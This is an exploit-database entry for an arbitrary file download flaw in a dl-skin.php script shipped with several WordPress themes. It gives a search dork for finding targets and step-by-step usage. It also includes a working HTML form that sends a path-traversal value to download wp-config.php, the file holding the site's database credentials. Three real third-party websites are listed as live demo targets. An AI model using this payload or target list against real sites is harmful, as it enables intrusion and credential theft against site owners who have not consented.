id: 25281
date: 10/03/2016
title: Wordpress Multi Themes Arbitrary File Download Vulnerability
author: xBADGIRL21
cves: 

######################
# Exploit Title : Wordpress Multi Themes Arbitrary File Download Vulnerability
# Exploit Author : xBADGIRL21
# Dork : wp-content/themes/ /lib/scripts/
# Tested on: [ BackBox ]
# skype:xbadgirl21
# Date: 22/08/2016
# video Proof : https://youtu.be/DFtF14_ShHk
# Myblog : http://xbadgirl21.blogspot.com/
######################
# [+] DESCRIPTION :
######################
# [+] Wordpress Multi Themes Arbitrary File Download iT's an Exploit Allow Attackers to Download
# [+] Files From Your Website and The Vulnerable File is : dl-skin.php
# [+] so Any Theme Wordpress Has This File Then he is Potentially Vulnerable
######################
# [+] USAGE :
1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1
+ 1.- Use Dork Above [ok] +
+ 2.- Download Exploit File Edit it [ok] +
+ 3.- Edit: http://localhost/wp-content/themes/bonkersbeat/lib/scripts/dl-skin.php [ok] +
+ 4.- Edit: the value you want To Download [ok] +
+ 5.- Run Exploit +
1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1
######################
# [+] Exploit:
######################
<html>
<body>
<form action="http://localhost/wp-content/themes/awake/lib/scripts/dl-skin.php" method="post">
Download:<input type="text" name="_mysite_download_skin" value="../../../../../wp-config.php"><br>
<input type="submit">
</form>
</body>
</html>
######################
# [+] Live Demo :
######################
# http://www.bonkersbeat.com/wp-content/themes/bonkersbeat/lib/scripts/dl-skin.php
# http://www.aemdum.ca/test/wp-content/themes/method/lib/scripts/dl-skin.php
# http://www.tumct.org/wp-content/themes/awake/lib/scripts/dl-skin.php
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
#######################
### Note ### : Themes Vuln
#######################
# Vuln themes not all : https://ghostbin.com/paste/yg36k
#######################

#  0day.today [2023-03-22]  #